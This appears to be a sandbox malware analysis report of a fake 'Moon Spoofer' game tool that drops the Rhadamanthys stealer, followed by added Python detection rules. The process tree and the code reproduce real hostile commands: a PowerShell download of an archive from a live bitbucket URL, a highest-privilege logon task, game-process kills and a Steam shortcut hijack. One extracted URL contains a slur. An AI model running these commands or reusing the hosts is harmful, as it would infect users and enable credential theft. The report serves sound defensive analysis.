Analysis

max time kernel: 148s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-06-2024 19:56
Static task: static1

Behavioral task: behavioral1
  Sample: Moon Spoofer/Moon Spoofer/Spoofer.exe
  Resource: win7-20240419-en

Behavioral task: behavioral2
  Sample: Moon Spoofer/Moon Spoofer/Spoofer.exe
  Resource: win10v2004-20240426-en
General

Target: Moon Spoofer/Moon Spoofer/Spoofer.exe
Size: 7KB
MD5: 960d70161f0ac1ddd8093955446bdcbc
SHA1: 5943c81939f9b43228e2fe2f65e90c54660ae47f
SHA256: 31e6573e37d06a71b3025c0e9ed4901093ed5262bc60bbbdf7ce1ed28ebb021a
SHA512: 8f3f6091fb3d09d4cdb0f9540bbbc2de0562dd5bb77c8446db49f274be7b173cbc0aa24206e25838cc6b6c6578440c0ecfd1a17acc94c50ebd014cbe16617c14
SSDEEP: 192:+9yqvjp73xsznGjcJr9emxan6mUqlwc6nYZKvkV/9dXq:+9Jv1dOnGjcJrQmxan6m/ec6nYZSkV/2
Malware Config
Extracted
https://rentry.org/FUCKOFFNIGGA/raw
Extracted
https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar
Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes:
description | pid | process | target process
PID 3172 created 2652 | 3172 | tco23iyp.2sp1.exe | sihost.exe

Blocklisted process makes network request (3 IoCs)
Processes:
flow | pid | process
4 | 1288 | powershell.exe
8 | 1288 | powershell.exe
20 | 4976 | powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | Spoofer.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | tco23iyp.2sp0.exe

Executes dropped EXE (2 IoCs)
Processes:
pid | process
624 | tco23iyp.2sp0.exe
3172 | tco23iyp.2sp1.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
Processes:
pid | process
1288 | powershell.exe
4976 | powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Delays execution with timeout.exe (2 IoCs)
Processes:
pid | process
1712 | timeout.exe
436 | timeout.exe

Enumerates processes with tasklist (1 TTP, 8 IoCs)
Processes:
pid | process
2588 | tasklist.exe
2296 | tasklist.exe
2036 | tasklist.exe
3316 | tasklist.exe
5112 | tasklist.exe
2872 | tasklist.exe
3320 | tasklist.exe
4004 | tasklist.exe

Kills process with taskkill (8 IoCs)
Processes:
pid | process
3192 | taskkill.exe
3628 | taskkill.exe
2392 | taskkill.exe
1816 | taskkill.exe
3836 | taskkill.exe
4364 | taskkill.exe
4780 | taskkill.exe
4956 | taskkill.exe

Suspicious behavior: EnumeratesProcesses (12 IoCs)
Processes (entries collapsed per process; the last column is the number of entries):
pid | process | entries
1288 | powershell.exe | 2
4976 | powershell.exe | 2
3172 | tco23iyp.2sp1.exe | 2
552 | dialer.exe | 4
5060 | powershell.exe | 2

Suspicious use of AdjustPrivilegeToken (19 IoCs)
Processes (every entry is Token: SeDebugPrivilege):
pid | process
1288 | powershell.exe
4976 | powershell.exe
2588 | tasklist.exe
2392 | taskkill.exe
3320 | tasklist.exe
3628 | taskkill.exe
2296 | tasklist.exe
3836 | taskkill.exe
2872 | tasklist.exe
4364 | taskkill.exe
5112 | tasklist.exe
4780 | taskkill.exe
3316 | tasklist.exe
4956 | taskkill.exe
2036 | tasklist.exe
3192 | taskkill.exe
4004 | tasklist.exe
1816 | taskkill.exe
5060 | powershell.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (entries collapsed per source/target pair; the last column is the number of "wrote to memory of" entries):
pid | process | target pid | target process | entries
2768 | Spoofer.exe | 1288 | powershell.exe | 2
1288 | powershell.exe | 624 | tco23iyp.2sp0.exe | 2
1288 | powershell.exe | 3172 | tco23iyp.2sp1.exe | 3
624 | tco23iyp.2sp0.exe | 2704 | cmd.exe | 2
2704 | cmd.exe | 3488 | chcp.com | 2
2704 | cmd.exe | 4840 | findstr.exe | 2
2704 | cmd.exe | 1980 | findstr.exe | 2
2704 | cmd.exe | 632 | findstr.exe | 2
2704 | cmd.exe | 3960 | schtasks.exe | 2
2704 | cmd.exe | 5052 | schtasks.exe | 2
2704 | cmd.exe | 3044 | cmd.exe | 2
3044 | cmd.exe | 4380 | reg.exe | 2
2704 | cmd.exe | 3620 | cmd.exe | 2
3620 | cmd.exe | 4964 | reg.exe | 2
2704 | cmd.exe | 4976 | powershell.exe | 2
3172 | tco23iyp.2sp1.exe | 552 | dialer.exe | 5
2704 | cmd.exe | 2588 | tasklist.exe | 2
2704 | cmd.exe | 532 | find.exe | 2
2704 | cmd.exe | 2392 | taskkill.exe | 2
2704 | cmd.exe | 3320 | tasklist.exe | 2
2704 | cmd.exe | 2636 | find.exe | 2
2704 | cmd.exe | 3628 | taskkill.exe | 2
2704 | cmd.exe | 2296 | tasklist.exe | 2
2704 | cmd.exe | 4480 | find.exe | 2
2704 | cmd.exe | 3836 | taskkill.exe | 2
2704 | cmd.exe | 2872 | tasklist.exe | 2
2704 | cmd.exe | 4500 | find.exe | 2
2704 | cmd.exe | 4364 | taskkill.exe | 2
2704 | cmd.exe | 5112 | tasklist.exe | 2
2704 | cmd.exe | 4600 | find.exe | 2

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indentation is parent/child depth; each entry shows the image, then the command line, then the signatures that fired on it)

C:\Windows\system32\sihost.exe
  command: sihost.exe

  C:\Windows\SysWOW64\dialer.exe
    command: "C:\Windows\system32\dialer.exe"
    - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\Moon Spoofer\Moon Spoofer\Spoofer.exe
  command: "C:\Users\Admin\AppData\Local\Temp\Moon Spoofer\Moon Spoofer\Spoofer.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe
      command: "C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe
        command: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.bat C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\chcp.com
          command: chcp 1251

        C:\Windows\system32\findstr.exe
          command: findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"

        C:\Windows\system32\findstr.exe
          command: findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"

        C:\Windows\system32\findstr.exe
          command: findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"

        C:\Windows\system32\schtasks.exe
          command: schtasks /query /tn "MyBatchScript"

        C:\Windows\system32\schtasks.exe
          command: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
          - Creates scheduled task(s)

        C:\Windows\system32\cmd.exe
          command: C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\reg.exe
            command: reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath

        C:\Windows\system32\cmd.exe
          command: C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\reg.exe
            command: reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\tasklist.exe
          command: tasklist
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\find.exe
          command: find /i "tf_win64.exe"

        C:\Windows\system32\taskkill.exe
          command: taskkill /f /im tf_win64.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\tasklist.exe
          command: tasklist
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\find.exe
          command: find /i "dota2.exe"

        C:\Windows\system32\taskkill.exe
          command: taskkill /f /im dota2.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\tasklist.exe
          command: tasklist
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\find.exe
          command: find /i "cs2.exe"

        C:\Windows\system32\taskkill.exe
          command: taskkill /f /im cs2.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\tasklist.exe
          command: tasklist
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\find.exe
          command: find /i "RustClient.exe"

        C:\Windows\system32\taskkill.exe
          command: taskkill /f /im RustClient.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\tasklist.exe
          command: tasklist
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\find.exe
          command: find /i "GTA5.exe"

        C:\Windows\system32\taskkill.exe
          command: taskkill /f /im GTA5.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\tasklist.exe
          command: tasklist
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\find.exe
          command: find /i "TslGame.exe"

        C:\Windows\system32\taskkill.exe
          command: taskkill /f /im TslGame.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\tasklist.exe
          command: tasklist
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\find.exe
          command: find /i "RainbowSix.exe"

        C:\Windows\system32\taskkill.exe
          command: taskkill /f /im RainbowSix.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\timeout.exe
          command: timeout /t 3
          - Delays execution with timeout.exe

        C:\Windows\system32\tasklist.exe
          command: tasklist
          - Enumerates processes with tasklist
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\find.exe
          command: find /i "steam.exe"

        C:\Windows\system32\taskkill.exe
          command: taskkill /f /im steam.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\timeout.exe
          command: timeout /t 3
          - Delays execution with timeout.exe

        C:\Windows\system32\tar.exe
          command: tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command: powershell "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\Admin\Desktop\Steam.lnk'); $s.TargetPath = '\steam.exe'; $s.Save()"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe
      command: "C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
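The batch stage in the tree above is a sequence of behaviours a detection engineer can key on individually: a schtasks onlogon task with highest run level pointing at a .vbs under AppData\Roaming, a PowerShell WebClient download of an archive into Temp, a tasklist/find/taskkill loop over game clients, extraction of that archive with the built-in tar.exe, a Desktop Steam.lnk rewritten to a relative steam.exe target, and, from the second dropped binary, dialer.exe appearing under sihost.exe although tco23iyp.2sp1.exe created it. The Python below is an added example, not code from the Triage report, the sample, or any vendor; it encodes those behaviours as rules over constructed process-creation events that mirror the tree. PIDs are the report's where it lists them; the tar.exe PID 4710, the ProcEvent field names, and the creator_pid field (standing in for whatever signal a sensor exposes when the creating process differs from the recorded parent) are assumptions.

```python
# Added example: behaviour rules for the Spoofer.exe chain over constructed events.
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Set, Tuple

@dataclass
class ProcEvent:
    """Process-creation record; field names are assumptions modelled on Sysmon Event ID 1."""
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    creator_pid: Optional[int] = None  # assumed sensor field: actual creator when it is not the parent

def _name(e: ProcEvent) -> str:
    return e.image.rsplit("\\", 1)[-1].lower()

def rule_onlogon_script_task(e: ProcEvent) -> bool:
    """schtasks /create with /sc onlogon and /rl highest whose action is a script under AppData."""
    c = e.cmdline.lower()
    return (_name(e) == "schtasks.exe" and "/create" in c and "/sc onlogon" in c
            and "/rl highest" in c
            and re.search(r'\\appdata\\[^"]*\.(vbs|js|wsf|bat|cmd|ps1)', c) is not None)

def rule_powershell_download_to_temp(e: ProcEvent) -> bool:
    """PowerShell WebClient.DownloadFile() that saves its payload under a Temp directory."""
    c = e.cmdline.lower()
    return _name(e) == "powershell.exe" and "downloadfile(" in c and "http" in c and "\\temp\\" in c

def rule_archive_extract_from_temp(e: ProcEvent) -> bool:
    """Built-in tar.exe unpacking an archive that sits in Temp (LOLBin extraction)."""
    c = e.cmdline.lower()
    return (_name(e) == "tar.exe" and "-xf" in c
            and re.search(r'\\temp\\[^"]*\.(rar|zip|7z|tar|gz)', c) is not None)

def rule_desktop_shortcut_hijack(e: ProcEvent) -> bool:
    """WScript.Shell CreateShortcut writing a Desktop .lnk whose TargetPath is not an absolute path."""
    c = e.cmdline.lower()
    if _name(e) != "powershell.exe" or "createshortcut(" not in c or "\\desktop\\" not in c:
        return False
    m = re.search(r"targetpath\s*=\s*'([^']*)'", c)
    return m is not None and re.match(r"[a-z]:\\", m.group(1)) is None

def rule_ppid_spoof(e: ProcEvent) -> bool:
    """Recorded parent differs from the process that actually created it (spoofed parent)."""
    return e.creator_pid is not None and e.creator_pid != e.parent_pid

PER_EVENT: Dict[str, Callable[[ProcEvent], bool]] = {
    "onlogon_script_task": rule_onlogon_script_task,
    "powershell_download_to_temp": rule_powershell_download_to_temp,
    "archive_extract_from_temp": rule_archive_extract_from_temp,
    "desktop_shortcut_hijack": rule_desktop_shortcut_hijack,
    "ppid_spoof": rule_ppid_spoof,
}

def taskkill_spree(events: List[ProcEvent], threshold: int = 3) -> List[int]:
    """Parents that run 'taskkill /f /im <image>' against at least `threshold` distinct images."""
    victims: Dict[int, Set[str]] = defaultdict(set)
    for e in events:
        if _name(e) == "taskkill.exe":
            m = re.search(r"/f\s+/im\s+(\S+)", e.cmdline, re.IGNORECASE)
            if m:
                victims[e.parent_pid].add(m.group(1).lower())
    return sorted(p for p, v in victims.items() if len(v) >= threshold)

def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """(rule, pid) hits; pid is the offending process, or the spawning parent for the spree rule."""
    hits = [(name, e.pid) for e in events for name, rule in PER_EVENT.items() if rule(e)]
    hits += [("taskkill_spree", p) for p in taskkill_spree(events)]
    return sorted(hits)

# Constructed events mirroring the report's tree. PIDs come from the report where it lists them;
# the tar.exe PID (4710) is made up. dialer.exe carries the report's sihost.exe parent (2652).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(2704, r"C:\Windows\system32\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.bat"', 624),
    ProcEvent(3960, r"C:\Windows\system32\schtasks.exe",
              r'schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f', 2704),
    ProcEvent(4976, PS, "powershell -Command \"(New-Object System.Net.WebClient).DownloadFile("
              "'https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar', "
              "'C:\\Users\\Admin\\AppData\\Local\\Temp\\downloaded_archive.rar')\"", 2704),
    ProcEvent(2392, r"C:\Windows\system32\taskkill.exe", "taskkill /f /im tf_win64.exe", 2704),
    ProcEvent(3628, r"C:\Windows\system32\taskkill.exe", "taskkill /f /im dota2.exe", 2704),
    ProcEvent(3836, r"C:\Windows\system32\taskkill.exe", "taskkill /f /im cs2.exe", 2704),
    ProcEvent(1816, r"C:\Windows\system32\taskkill.exe", "taskkill /f /im steam.exe", 2704),
    ProcEvent(4710, r"C:\Windows\system32\tar.exe",
              r'tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""', 2704),
    ProcEvent(5060, PS, "powershell \"$ws = New-Object -ComObject WScript.Shell; "
              "$s = $ws.CreateShortcut('C:\\Users\\Admin\\Desktop\\Steam.lnk'); "
              "$s.TargetPath = '\\steam.exe'; $s.Save()\"", 2704),
    ProcEvent(552, r"C:\Windows\SysWOW64\dialer.exe", r'"C:\Windows\system32\dialer.exe"', 2652, creator_pid=3172),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid}")
```

Run stand-alone it reports six hits, one per behaviour listed above plus the taskkill spree attributed to the cmd.exe parent. In production the ProcEvent list would be built from Sysmon Event ID 1 or Security 4688 records; the spoofed-parent rule only works with a sensor that records the creating process separately from the parent PID, since the event log alone shows sihost.exe as the parent of dialer.exe exactly as the report's tree does. The spree rule is threshold-based rather than tied to the game names in this sample, so it generalises to other process lists.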
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 71444def27770d9071039d005d0323b7
  SHA1: cef8654e95495786ac9347494f4417819373427e
  SHA256: 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
  SHA512: a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 0f6a3762a04bbb03336fb66a040afb97
  SHA1: 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
  SHA256: 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
  SHA512: cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.bat
  Filesize: 6KB
  MD5: 5356df66c550e8bf737e23956f5a8406
  SHA1: 8f40c948922bcc96ee5bb79ad6ed71ac0369c7f9
  SHA256: 3b03eba10dc8cc18f1ffa3726d6ff3e242183da10b47c8217f0b3b79eee1b3c8
  SHA512: abef71ab94f3821f5430d1f65902fc06b2bd73b6c2014d8c9fc5718e9241db5534f033a414d328d1f135d454f46d44986bc5cab52f2d8c828557d92e3976e7f4

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pli5ayhi.juk.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe
  Filesize: 126KB
  MD5: 2f6b6a51b8426be18badffd9294b0d9f
  SHA1: 2d4aaeffe325c93e61c38349d5a41fdb1b58c24f
  SHA256: 36d868815764b2c7b77ded962a02c2949db328a98ac714644e9426bb6d47fa1a
  SHA512: 3628f903a02fd27b049addfba2f936aee4d039f2c201438fd12d8bca58ab2dee852d3cfd54cd78fe9ec0b2ea86eb85c980dcea271e76e26a7588a4e8fc614d6c

C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe
  Filesize: 355KB
  MD5: 01a72f1659cfe71d56340773f3c89bf9
  SHA1: b87d0a06df5896b9129efd823ea237905cfa9d1e
  SHA256: 7205faf5054589ce7dc6b68dcfea45c18859cb49a3c0d4bda840fc9d308152bd
  SHA512: 59e1de953a7bbb7f87da2de9c9575ba7c0098b31afc549c1eff2256ee9beddc590aec88d32716f386fd3a7037d610365d72bbded94278cd0d341ce337579d1e8

Memory dumps (pid-sequence-range):
memory dump | Filesize
memory/552-60-0x0000000000B70000-0x0000000000B79000-memory.dmp | 36KB
memory/552-64-0x00007FFDEFAF0000-0x00007FFDEFCE5000-memory.dmp | 2.0MB
memory/552-66-0x00000000757D0000-0x00000000759E5000-memory.dmp | 2.1MB
memory/552-63-0x0000000002910000-0x0000000002D10000-memory.dmp | 4.0MB
memory/1288-14-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp | 10.8MB
memory/1288-15-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp | 10.8MB
memory/1288-41-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp | 10.8MB
memory/1288-8-0x000002A32F660000-0x000002A32F682000-memory.dmp | 136KB
memory/1288-17-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp | 10.8MB
memory/1288-13-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp | 10.8MB
memory/1288-16-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp | 10.8MB
memory/2768-1-0x00007FFDD1A43000-0x00007FFDD1A45000-memory.dmp | 8KB
memory/2768-0-0x0000000000B80000-0x0000000000B88000-memory.dmp | 32KB
memory/3172-61-0x0000000000E80000-0x0000000000EED000-memory.dmp | 436KB
memory/3172-56-0x0000000004120000-0x0000000004520000-memory.dmp | 4.0MB
memory/3172-40-0x0000000000E80000-0x0000000000EED000-memory.dmp | 436KB
memory/3172-55-0x0000000004120000-0x0000000004520000-memory.dmp | 4.0MB
memory/3172-59-0x00000000757D0000-0x00000000759E5000-memory.dmp | 2.1MB
memory/3172-57-0x00007FFDEFAF0000-0x00007FFDEFCE5000-memory.dmp | 2.0MB